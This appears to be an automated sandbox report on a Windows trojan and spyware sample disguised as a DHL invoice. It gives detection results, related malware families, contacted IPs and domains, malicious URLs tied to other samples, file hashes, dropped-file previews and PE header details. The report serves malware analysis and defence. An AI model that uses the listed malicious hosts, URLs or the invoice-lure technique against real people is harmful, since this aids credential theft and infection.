                                                                                                  Sample name:DHL DOC INV 191224.gz.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/2@3/3
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 50%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 99%
                                                                                                  • Number of executed functions: 50
                                                                                                  • Number of non-executed functions: 294
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                  • Execution Graph export aborted for target RegSvcs.exe, PID 6608 because it is empty
                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  07:45:08API Interceptor9694300x Sleep call for process: RegSvcs.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  149.154.167.220mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                    eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                        Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                          vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                            Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                              file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                  Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                    iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                      188.114.97.3dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • /api/get/free
                                                                                                                      dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • /api/get/free
                                                                                                                      RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.rgenerousrs.store/o362/
                                                                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.beylikduzu616161.xyz/2nga/
                                                                                                                      Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                      • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                                                      ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                                      • paste.ee/d/lxvbq
                                                                                                                      Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                      • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                                                      PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.ssrnoremt-rise.sbs/3jsc/
                                                                                                                      QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                                      http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                      • kklk16.bsyo45ksda.top/favicon.ico

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      reallyfreegeoip.orgfile.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 104.21.67.152
                                                                                                                      INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 172.67.177.134
                                                                                                                      Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 172.67.177.134
                                                                                                                      HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 172.67.177.134
                                                                                                                      EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 172.67.177.134
                                                                                                                      Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 104.21.67.152
                                                                                                                      checkip.dyndns.comfile.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 193.122.6.168
                                                                                                                      PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 132.226.8.169
                                                                                                                      PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 193.122.130.0
                                                                                                                      Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      ZOYGRL1ePa.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 193.122.6.168
                                                                                                                      Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 193.122.6.168
                                                                                                                      HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 193.122.6.168
                                                                                                                      EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 193.122.6.168
                                                                                                                      api.telegram.orgmcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                      • 149.154.167.220

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      TELEGRAMRUmcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      over.ps1Get hashmaliciousVidarBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      CLOUDFLARENETUSMDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.2.160
                                                                                                                      MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.2.160
                                                                                                                      MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.2.160
                                                                                                                      https://www.ecorfan.org/Get hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.24.14
                                                                                                                      https://debeeyardelia.pages.devGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      Setup.exe.7zGet hashmaliciousUnknownBrowse
                                                                                                                      • 172.64.41.3
                                                                                                                      http://www.johnlewis-partnerships.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.18.43.2
                                                                                                                      https://gldkzr-lpqw.buzz/script/ut.js?cb%5C=1735764124690Get hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.0.170
                                                                                                                      1.ps1Get hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                      • 104.21.96.1
                                                                                                                      random(4).exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                      • 172.67.129.178
                                                                                                                      ORACLE-BMC-31898USHilix.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 140.238.15.187
                                                                                                                      file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 193.122.6.168
                                                                                                                      PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 193.122.130.0
                                                                                                                      ZOYGRL1ePa.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 193.122.6.168
                                                                                                                      armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 129.148.142.134
                                                                                                                      Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 193.122.6.168
                                                                                                                      HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 193.122.6.168
                                                                                                                      splm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 129.147.168.111
                                                                                                                      EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 193.122.6.168

                                                                                                                      JA3 Fingerprints

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adNL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eNOTIFICATION_OF_DEPENDANTS_1.vbsGet hashmaliciousXmrigBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      CRf9KBk4ra.exeGet hashmaliciousDCRatBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      7FEGBYFBHFBJH32.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      1.ps1Get hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Let's_20Compress.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\user\AppData\Local\Temp\aut2DC9.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):122774
                                                                                                                      Entropy (8bit):7.948058457170821
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:34ULfSx0QTR6i/SYrVclLIzll0XHYq555vwg:34IqxzMink8soqP5v5
                                                                                                                      MD5:EC65F2BA51C5109595631773EDB2D910
                                                                                                                      SHA1:E5A575835A3C580529279D09F10CC8558AC28F3D
                                                                                                                      SHA-256:5E85CF36C1C16DE3B973C5B96953C4EB84738B1EB669E1574379CFFA46774281
                                                                                                                      SHA-512:FFE6A7FB9538EB6FF0DE1A198FBA7F8D33E2D9A09DDFFCEE707CC79F972F8D9B77BBDDC5600ABF722F84992212D384BC8ABCAC76FBDCF7F4C52E58C18C93491F
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:EA06.......J..I...T.o"kJ..f.Z.*.L.V(. .r...T..ZT.._3@..m@...k.D.~'.[/.m..]#.,./E.W.TY$..7...4^G,..f.+.z.j...Yd.a).Ui5....l..T..6.Pr}..H.sZ*eBm>..h.~m..T..9..P.. ...F..!UJdP.\..\`....P.R....15...Y.V.J..\4)....q.(..o.I..4...Z......S....S....iX..............I0.q...(..P....\l..@..R.6..d@..V...b.TY.\...M....T.w.....^.D........J..f..?...L..\|s.}X......Z-......$.J.\<.)..=............q<.J.....6.4..'4...N...x...../.....\..".`..V..K..J...3..*.............v..U*.@......j.;.2.=..?.h...@.S@~..R.I......n..g.P#.G..*S..6.K.O.y..c@..h..u2o..U&.....B.V&.m...7...*d..~.M.t....O.H.t..z;g..:.P...a.U*..%."..Qi.z-..^.M+..d.......k.&}J..c.[].U@../3{].WF.S*..._G..(4...-&.T..[.V.`.Wf.Ztj.....U..V.I..j..M2.....4Y...`.L..%Z9A......=J...5..R.4.Y.. /r.B.s$`.z..9......2.I.T[.~.;...sy.23..iv).2i^.^!...&.B.T+.ZT.....R.X.),....[...G...{l&.T.Q.u......,...Rco..hv-.2iR.T&....N.R...Dv'A.K......A....%Rm5.Lm.=..T.O.V....\......RcG..*t..:m[.....m^.?..F....k..W..j./..E....7....Y...\.

                                                                                                                      C:\Users\user\AppData\Local\Temp\peaks

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):237056
                                                                                                                      Entropy (8bit):6.941867658049194
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:BICnXmLIzYsMS/4qvpDilYFCYkdKF+z2FHbZ/Rgj1:BdnGIssMStilukdC+z2Ft/Ri
                                                                                                                      MD5:AB0A62D1936E325759037B0BB688D410
                                                                                                                      SHA1:9D1EAA5C5A777228710FEF15DCACABD1255CDA8B
                                                                                                                      SHA-256:3937AA06834339FB58CAF1BFCC4268F251EA848ABBA692F306C0A8C4DF787C3B
                                                                                                                      SHA-512:DF4B72B60FFA362F459A784B7C43C5E26DD5D4FDDF2697D039F2D4D7F9FC9BEA24790D3F9CBC23C0974A9CF08FD1BF6FBBEEBA4B73B591AB08869213B468494D
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:.n.DQ7AIQKBL..5J.E7EAJTLtXDR7AIUKBLR75J1E7EAJTL4XDR7AIUKBLR7.J1E9Z.DT.=.e.6..t.*%!.E8^"E$,j7-Z6+&.#,u97"r^[ju.de,%0).UIX.AIUKBLRgpJ1.6FA...RXDR7AIUK.LP6>KaE7.BJTX4XDR7A..HBLr75J.F7EA.TL.XDR5AIQKBLR75J5E7EAJTL4X@R7CIUKBLR55..E7UAJDL4XDB7AYUKBLR7%J1E7EAJTL4X|.4A.UKBL.45]!E7EAJTL4XDR7AIUKBLR.6J=E7EAJTL4XDR7AIUKBLR75J1E7EAJTL4XDR7AIUKBLR75J1E7EAJTl4XLR7AIUKBLR75B.E7.AJTL4XDR7AI{?'4&75J..4EAjTL4.GR7CIUKBLR75J1E7EAjTLTv6!E"IUKU\R75.2E7WAJT.7XDR7AIUKBLR75.1Ewk3/8#WXD^7AIU.ALR55J1.4EAJTL4XDR7AIU.BL.75J1E7EAJTL4XDR71.VKBLR7}J1E5EDJ.c6X.$6AJUKB.R73..G7.AJTL4XDR7AIUKBLR75J1E7EAJTL4XDR7AIUKBLR75J1.J.N..]+.7AIUKBMP41L9M7EAJTL4X:R7A.UKB.R75}1E7`AJT!4XDv7AI+KBL,75JUE7E3JTLUXDRpAIU$BLRY5J1;7EATVd.XDX.gIWccLR=5`.6.EA@.M4X@!.AI_.@LR3Fn1E=.BJTHG}DR=.MUKF?t75@.@7EE`.L7.RT7AR:rBLX76.$C7EZ`rL6p~R7KI.mBO."3J1^.gAH.E4X@xa2TUKDd.75@EL7EC.^L4\nL5i.UKHfpI>J1A.Ekh*@4X@y7kk+FBLV.5`/G.HAJPf.&JR7EbUa`2]75N.E.[C.[L4\npIQIUOiLx.K[1E3nA`v2&XDV.Acw5QLR3.J.gIQAJPg4rf,"AIQ`BfpI#J1A.Ekh*[4X@y7kk+SBLV.5`/G.]AJPf2r&REr_U;A

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):6.951110925423519
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:DHL DOC INV 191224.gz.exe
                                                                                                                      File size:1'106'432 bytes
                                                                                                                      MD5:49a44e1bd7ae31824843c4316f35eb35
                                                                                                                      SHA1:29ca56d04c4d089d7aa30df2d3480988da425fc0
                                                                                                                      SHA256:9ea5173104481c6538cb5fcdadc74682b3d422750039ab3311afe694e59b4602
                                                                                                                      SHA512:c7e88ce41dd529f69d5a9aeb0d6a87fff85872215eb92815a67eb4b6533ff19a0e985572185b1ebda374635684ac8a1a7cde7737e780676ebb09f4d9aa98c600
                                                                                                                      SSDEEP:24576:SqDEvCTbMWu7rQYlBQcBiT6rprG8aThZqa2nU5:STvC/MTQYxsWR7aTd2
                                                                                                                      TLSH:0535BF0273D1C062FFAB92334B5AF6515BBC69260123E61F13981D7ABE701B1563E7A3
                                                                                                                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                                                                      File Icon

                                                                                                                      Icon Hash:aaf3e3e3938382a0

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x420577
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x67636BC0 [Thu Dec 19 00:41:36 2024 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:5
                                                                                                                      OS Version Minor:1
                                                                                                                      File Version Major:5
                                                                                                                      File Version Minor:1
                                                                                                                      Subsystem Version Major:5
                                                                                                                      Subsystem Version Minor:1
                                                                                                                      Import Hash:948cc502fe9226992dce9417f952fce3

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      call 00007F4674E170C3h
                                                                                                                      jmp 00007F4674E169CFh
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                      mov esi, ecx
                                                                                                                      call 00007F4674E16BADh
                                                                                                                      mov dword ptr [esi], 0049FDF0h
                                                                                                                      mov eax, esi
                                                                                                                      pop esi
                                                                                                                      pop ebp
                                                                                                                      retn 0004h
                                                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                                                      mov eax, ecx
                                                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                                                      mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                                      mov dword ptr [ecx], 0049FDF0h
                                                                                                                      ret
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                      mov esi, ecx
                                                                                                                      call 00007F4674E16B7Ah
                                                                                                                      mov dword ptr [esi], 0049FE0Ch
                                                                                                                      mov eax, esi
                                                                                                                      pop esi
                                                                                                                      pop ebp
                                                                                                                      retn 0004h
                                                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                                                      mov eax, ecx
                                                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                                                      mov dword ptr [ecx+04h], 0049FE14h
                                                                                                                      mov dword ptr [ecx], 0049FE0Ch
                                                                                                                      ret
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      mov esi, ecx
                                                                                                                      lea eax, dword ptr [esi+04h]
                                                                                                                      mov dword ptr [esi], 0049FDD0h
                                                                                                                      and dword ptr [eax], 00000000h
                                                                                                                      and dword ptr [eax+04h], 00000000h
                                                                                                                      push eax
                                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                                      add eax, 04h
                                                                                                                      push eax
                                                                                                                      call 00007F4674E1976Dh
                                                                                                                      pop ecx
                                                                                                                      pop ecx
                                                                                                                      mov eax, esi
                                                                                                                      pop esi
                                                                                                                      pop ebp
                                                                                                                      retn 0004h
                                                                                                                      lea eax, dword ptr [ecx+04h]
                                                                                                                      mov dword ptr [ecx], 0049FDD0h
                                                                                                                      push eax
                                                                                                                      call 00007F4674E197B8h
                                                                                                                      pop ecx
                                                                                                                      ret
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      mov esi, ecx
                                                                                                                      lea eax, dword ptr [esi+04h]
                                                                                                                      mov dword ptr [esi], 0049FDD0h
                                                                                                                      push eax
                                                                                                                      call 00007F4674E197A1h
                                                                                                                      test byte ptr [ebp+08h], 00000001h
                                                                                                                      pop ecx

                                                                                                                      Rich Headers

                                                                                                                      Programming Language:
                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                      • [IMP] VS2008 SP1 build 30729

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x376d4.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x10c0000x7594.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rsrc0xd40000x376d40x37800632c092f599a5a8d3c2138218753de06False0.880639428490991data7.779527864520921IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0x10c0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                      RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                      RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                      RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                      RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
